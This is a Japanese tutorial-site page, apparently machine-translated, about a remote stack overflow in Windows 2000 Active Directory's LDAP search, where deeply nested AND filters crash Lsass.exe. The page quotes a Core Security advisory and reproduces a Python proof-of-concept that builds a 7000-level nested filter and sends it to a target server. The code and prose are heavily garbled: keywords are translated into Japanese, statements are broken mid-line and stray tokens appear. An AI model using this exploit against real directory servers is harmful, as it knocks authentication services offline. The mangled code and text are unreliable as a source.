Windows system >> Windowsの知識 >  >> Windows Serverシステムのチュートリアル >> Windows Serverチュートリアル >> Microsoft WindowsのActive Directoryのリモートスタックオーバーフローの脆弱性は、

Microsoft WindowsのActive Directoryのリモートスタックオーバーフローの脆弱性は、

  

はプログラムに関する:Win2kのActive Directoryの


説明:Microsoft WindowsのActive Directoryのリモートスタックオーバーフローの脆弱

詳細

Windows Active Directoryは、Windows 2000アーキテクチャの重要なコンポーネントであり、マイクロソフトの強力なディレクトリサービスシステムです。

Windows Active DirectoryのLDAP 3検索要求機能では、ユーザーの送信要求に対する正しいバッファ境界チェックが行われていないため、リモートの攻撃者がLsass.exeサービスをクラッシュさせ、バッファオーバーフローを引き起こす可能性があります。

Active Directoryを介して提供されるディレクトリサービスは、LDAPプロトコルに基づいており、そのプロトコルを使用してActive Directoryオブジェクトを格納および取得します。 Active Directoryを使用したLDAPの「検索要求」要求機能に問題があり、攻撃者が1000を超える「AND」要求を作成してサーバーに送信すると、スタックオーバーフローが発生し、Lsass.exeサービスがクラッシュする可能性があります。 30秒以内に再起動してください。



攻撃:COREセキュリティ技術勧告
[email protected])以下の試験方法を提供しています。ここでは

はPythonのテストスクリプトです:

------------------------------------
class ActiveDirectoryDOS(Ldap):< Br>

def __init __(self):
self._s =なし
self.host = '192.168.0.1'
self.basedn = 'dc = bugweek、dc = corelabs、 DC =コア-SDI、dc = comの '
self.port = 389
self.buffer ='「
self.msg_id = 1
のLdap .__ INIT __()
ログイン

def generateFilter_BinaryOp(self、filter):
filterBuffer = asn1.OCTETSTRING(filter [1]).code()+ asn1.OCTETSTRING(filter [2])。encode()
filterBuffer = self.encapsulateHeader (フィルタ[0]、filterBuffer)はfilterBuffer
ログイン

generateFilter_RecursiveBinaryOp DEF(SELを返す
f、filter、numTimes):
simpleBinOp = self.generateFilter_BinaryOp(filter)
filterBuffer = simpleBinOp
範囲(0、numTimes)内のcntについて:
filterBuffer = self.encapsulateHeader(self.LDAP_FILTER_AND、 filterBuffer + simpleBinOp)が返す
filterBuffer

DEF searchSub(自己、filterBuffer):

self.bindRequest()
self.searchRequest(filterBuffer)< BR>

DEF実行(自己、ホスト= ''、ベースDN = ''、名前= ''):

#マシンが存在していなければなりません
マシン名= ' xaxax '

filterComputerNotInDir =(Ldap.LDAP_FILTER_EQUAL99vY、' 名前 'マシン名)

#は匿名のクエリ
印刷実行' filterBuffer
クエリを実行する」を= self.generateFilter_RecursiveBinaryOp(filterComputerNotInDir、7000)
self.searchSub(filterBuffer)
ログイン

Copyright © Windowsの知識 All Rights Reserved